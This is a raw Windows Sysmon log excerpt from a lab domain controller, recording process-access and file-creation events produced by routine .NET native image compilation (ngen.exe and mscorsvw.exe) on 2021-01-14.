13:23:50.736{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45E6-6000-E502-000000009A01}4352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007053Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:50.721{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45E6-6000-E502-000000009A01}4352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007052Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:50.721{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45E6-6000-E502-000000009A01}4352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007051Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:50.580{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45E6-6000-E402-000000009A01}4908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007050Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:50.564{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45E6-6000-E402-000000009A01}4908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007049Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:50.564{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45E6-6000-E402-000000009A01}4908C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007048Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:50.393{08A6967A-45E3-6000-E302-000000009A01}3084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c0c-0\System.Workflow.ComponentModel.dll2021-01-14 13:23:50.393 10341000x80000000000000007061Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:52.783{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45E8-6000-E702-000000009A01}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007060Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:52.783{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45E8-6000-E702-000000009A01}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007059Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:52.783{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45E8-6000-E702-000000009A01}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007058Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:52.690{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45E8-6000-E602-000000009A01}4312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007057Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:52.674{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45E8-6000-E602-000000009A01}4312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007056Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:52.674{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45E8-6000-E602-000000009A01}4312C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007055Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:52.565{08A6967A-45E6-6000-E502-000000009A01}4352C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1100-0\System.Workflow.Runtime.dll2021-01-14 13:23:52.565 10341000x80000000000000007065Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:53.971{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45E9-6000-E802-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007064Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:53.955{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45E9-6000-E802-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007063Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:53.955{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45E9-6000-E802-000000009A01}3672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007062Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:53.862{08A6967A-45E8-6000-E702-000000009A01}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12bc-0\System.WorkflowServices.dll2021-01-14 13:23:53.862 10341000x80000000000000007085Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.690{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EA-6000-EE02-000000009A01}5024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007084Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.674{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45EA-6000-EE02-000000009A01}5024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007083Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.674{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EA-6000-EE02-000000009A01}5024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007082Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.612{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EA-6000-ED02-000000009A01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007081Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.596{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EA-6000-ED02-000000009A01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007080Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.596{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EA-6000-ED02-000000009A01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007079Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.471{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EA-6000-EC02-000000009A01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007078Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.471{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EA-6000-EC02-000000009A01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007077Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.471{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EA-6000-EC02-000000009A01}4116C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007076Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:54.409{08A6967A-45EA-6000-EB02-000000009A01}4936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1348-0\System.Xml.Serialization.dll2021-01-14 13:23:54.409 